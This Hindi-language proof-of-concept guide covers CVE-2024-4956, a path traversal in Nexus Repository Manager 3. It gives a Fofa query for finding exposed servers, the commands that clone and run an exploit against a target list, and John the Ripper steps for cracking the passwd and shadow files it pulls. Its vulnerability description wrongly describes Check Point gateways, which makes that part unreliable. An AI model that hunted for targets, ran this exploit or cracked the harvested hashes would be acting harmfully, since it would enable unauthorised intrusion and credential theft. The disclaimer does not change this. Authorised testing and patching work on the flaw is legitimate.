
POC - CVE-2024–4956 - Nexus Repository Manager 3 बिना प्रमाणीकरण के पाथ ट्रैवर्सल
संभावित रूप से एक हमलावर को इंटरनेट से कनेक्ट होने और Remote Access VPN या Mobile Access Software Blades सक्षम होने पर Check Point Security Gateways पर कुछ जानकारी पढ़ने की अनुमति देता है। इस भेद्यता को कम करने वाला एक सुरक्षा फिक्स उपलब्ध है।
इसके बारे में पढ़ें — CVE-2024-4956
अस्वीकरण: यह Proof of Concept (POC) केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं।
संभावित लक्ष्य खोजने के लिए, Fofa (Shodan.io के समान) का उपयोग करें:
header="Server: Nexus/3.53.0-01 (OSS)"
सबसे पहले, रिपॉज़िटरी क्लोन करें:
git clone https://github.com/verylazytech/CVE-2024-4956
फिर अपना लक्ष्य चुनें और उसे list.txt फ़ाइल में इस प्रारूप में जोड़ें:
एक्सप्लॉइट चलाएँ:
python3 CVE-2024-4956.py -l list.txt
आउटपुट में passwd और shadow फ़ाइलें मिलती हैं:

अब जब आपको passwd और shadow दोनों फ़ाइलें मिल जाएँ, तो आप JohnTheRipper के साथ हैश क्रैक करने का प्रयास कर सकते हैं। एक्सप्लॉइट चलाने के बाद आपके पास 2 फ़ाइलें होती हैं, passwd और shadow, इसलिए आप उन्हें एक फ़ाइल में मर्ज करके क्रैक करने का प्रयास कर सकते हैं (मैंने rockyou.txt का उपयोग किया, लेकिन यह कोई भी पासवर्ड वर्डलिस्ट हो सकती है):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt